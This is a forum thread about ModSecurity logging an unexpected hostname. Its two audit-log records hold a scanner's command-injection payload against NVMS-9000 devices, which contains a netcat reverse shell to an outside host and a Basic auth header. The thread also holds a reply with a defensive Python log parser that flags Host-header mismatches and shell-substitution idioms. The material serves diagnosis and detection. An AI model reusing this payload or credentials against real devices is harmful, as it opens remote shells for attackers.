Strange behaviour modsecurity

simpel (Verified User, joined Jun 6, 2019, 18 messages)
Sometimes ModSecurity reports the hostname as a non-local server IP address. Anyone seeing this as well?

example:

Two different reports ( same rule ):
Let's assume our server's IP address is: 111.222.333.444

REPORT 1 (with correct hostname):
Code:
--76d5ab25-A--
[14/Oct/2019:09:47:56 +0200] XaQoLEL5IB6w0CMRG6frZAAAAL0 2.237.6.173 55941 111.222.333.444 80
--76d5ab25-B--
POST /editBlackAndWhiteList HTTP/1.1
Accept-Encoding: identity
Content-Length: 586
Accept-Language: en-us
Host: 111.222.333.444
Accept: */*
User-Agent: ApiTool
Connection: close
Cache-Control: max-age=0
Content-Type: text/xml
Authorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=

--76d5ab25-C--
<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>
--76d5ab25-F--
HTTP/1.1 500 Internal Server Error
Content-Length: 532
Connection: close
Content-Type: text/html; charset=iso-8859-1

--76d5ab25-H--
Message: XML parser error: XML: Failed parsing document.
Message: XML parser error: XML: Failed parsing document.
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 2.237.6.173] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "111.222.333.444"] [uri "/editBlackAndWhiteList"] [unique_id "XaQoLEL5IB6w0CMRG6frZAAAAL0"]
In this case the hostname IP is correct; it's the same as our server's IP (111.222.333.444).





REPORT 2 (same day, same server, same rule triggered, but a couple of hours later that day):
Code:
--c209e53c-A--
[14/Oct/2019:16:04:52 +0200] XaSAhEL5IB6w0CMRG6fr3AAAAKA 192.182.166.214 59608 111.222.333.444 80
--c209e53c-B--
POST /editBlackAndWhiteList HTTP/1.1
Accept-Encoding: identity
Content-Length: 586
Accept-Language: en-us
Host: 94.26.22.50
Accept: */*
User-Agent: ApiTool
Connection: close
Cache-Control: max-age=0
Content-Type: text/xml
Authorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=

--c209e53c-C--
<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>
--c209e53c-F--
HTTP/1.1 500 Internal Server Error
Content-Length: 532
Connection: close
Content-Type: text/html; charset=iso-8859-1

--c209e53c-H--
Message: XML parser error: XML: Failed parsing document.
Message: XML parser error: XML: Failed parsing document.
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 192.182.166.214] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "94.26.22.50"] [uri "/editBlackAndWhiteList"] [unique_id "XaSAhEL5IB6w0CMRG6fr3AAAAKA"]
In this case the hostname is reported as 94.26.22.50, which is very definitely NOT our server's IP address!

How is this possible?
 
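The two reports above contain the answer if you read parts A and H side by side. The fifth field of part A (111.222.333.444 80) is the local socket address the connection was accepted on, which the client cannot influence. The [hostname "..."] in part H is Apache's view of the request's host name, which with the default UseCanonicalName Off is taken from the client-supplied Host header, and in report 2 the client sent "Host: 94.26.22.50". Scanners that iterate an IP list with a pre-built request commonly leave a stale or unrelated Host value in it, so a Host header that matches neither the local address nor one of your own virtual-host names is itself a useful signal. The following is an added example for this thread, not code from the original post or from the ModSecurity project; it parses the serial audit-log layout shown in the post (A, B, C, H parts between --id-X-- boundaries), compares the part-A destination address with the Host header and the logged hostname, and also flags the shell-substitution idioms ($(...), backticks, ${IFS}) visible in the posted payload. The sample log is constructed from trimmed copies of the two reports, and all function names are this example's own.

```python
# Added example (not from the original post or the ModSecurity project): parse
# ModSecurity v2 serial audit-log records and flag requests whose Host header
# does not name the address the connection actually arrived on.
import re
from dataclasses import dataclass, field

BOUNDARY_RE = re.compile(r"^--([0-9a-fA-F]{8})-([A-Z])--$")
# Part A: [timestamp] unique_id client_ip client_port server_ip server_port
PART_A_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+(?P<uid>\S+)\s+(?P<src>\S+)\s+(?P<sport>\d+)\s+"
    r"(?P<dst>\S+)\s+(?P<dport>\d+)\s*$")
HOSTNAME_RE = re.compile(r'\[hostname "([^"]*)"\]')
SHELL_SUBST_RE = re.compile(r"\$\(|`|\$\{IFS\}")  # idioms seen in the post's payload


@dataclass
class AuditRecord:
    boundary: str
    parts: dict = field(default_factory=dict)  # section letter -> list of lines

    def conn_field(self, name):
        m = PART_A_RE.match((self.parts.get("A") or [""])[0])
        return m.group(name) if m else None

    @property
    def server_ip(self):  # local socket address the request was delivered to
        return self.conn_field("dst")

    def header(self, name):
        """Request header from part B (case-insensitive), or None if absent."""
        for line in self.parts.get("B", [])[1:]:  # line 0 is the request line
            key, sep, value = line.partition(":")
            if sep and key.strip().lower() == name.lower():
                return value.strip()
        return None

    @property
    def logged_hostname(self):
        """[hostname "..."] from part H; Apache fills it from the Host header."""
        m = HOSTNAME_RE.search("\n".join(self.parts.get("H", [])))
        return m.group(1) if m else None


def parse_audit_log(text):
    """A new record starts whenever the boundary id changes, so a Z part is optional."""
    records, current, section = [], None, None
    for line in text.splitlines():
        m = BOUNDARY_RE.match(line.rstrip("\r"))
        if m:
            boundary, section = m.group(1), m.group(2)
            if current is None or current.boundary != boundary:
                current = AuditRecord(boundary)
                records.append(current)
            current.parts[section] = []
        elif current is not None:
            current.parts[section].append(line)
    return records


def host_without_port(host):
    if host.startswith("["):  # bracketed IPv6 literal such as [2001:db8::1]:8080
        return host[1:host.index("]")]
    return host.rsplit(":", 1)[0] if host.count(":") == 1 else host


def host_mismatch(record, known_hosts=()):
    """True when Host names neither the local address nor a known vhost name."""
    host = record.header("Host")
    return host is not None and host_without_port(host) not in {record.server_ip, *known_hosts}


def body_has_shell_substitution(record):
    return bool(SHELL_SUBST_RE.search("\n".join(record.parts.get("C", []))))


def analyze(text, known_hosts=()):
    """One summary dict per record; mismatch plus shell substitution = scanner hit."""
    return [{"client": r.conn_field("src"), "server_ip": r.server_ip,
             "host_header": r.header("Host"), "logged_hostname": r.logged_hostname,
             "host_mismatch": host_mismatch(r, known_hosts),
             "shell_substitution": body_has_shell_substitution(r)}
            for r in parse_audit_log(text)]


# Constructed sample, trimmed from the two reports in the post (111.222.333.444
# is the poster's placeholder for the server address, not a real IPv4 address).
SAMPLE_LOG = """\
--76d5ab25-A--
[14/Oct/2019:09:47:56 +0200] XaQoLEL5IB6w0CMRG6frZAAAAL0 2.237.6.173 55941 111.222.333.444 80
--76d5ab25-B--
POST /editBlackAndWhiteList HTTP/1.1
Host: 111.222.333.444

--76d5ab25-C--
<request><ip>$(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)</ip></request>
--76d5ab25-H--
Apache-Error: [client 2.237.6.173] ModSecurity: XML parser error [hostname "111.222.333.444"] [uri "/editBlackAndWhiteList"]
--c209e53c-A--
[14/Oct/2019:16:04:52 +0200] XaSAhEL5IB6w0CMRG6fr3AAAAKA 192.182.166.214 59608 111.222.333.444 80
--c209e53c-B--
POST /editBlackAndWhiteList HTTP/1.1
Host: 94.26.22.50

--c209e53c-C--
<request><ip>$(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)</ip></request>
--c209e53c-H--
Apache-Error: [client 192.182.166.214] ModSecurity: XML parser error [hostname "94.26.22.50"] [uri "/editBlackAndWhiteList"]
"""
```

Run `analyze(open("/var/log/apache2/modsec_audit.log").read(), known_hosts={"www.example.org"})` against a real serial audit log, passing the names your virtual hosts actually answer to, and every row with `host_mismatch` True is a request whose Host header was not meant for this server; when `shell_substitution` is also True, as in both reports above, it is the same kind of blind command-injection probe the poster caught, and the 500 it received came from the XML parser rejecting the body, not from the injection succeeding.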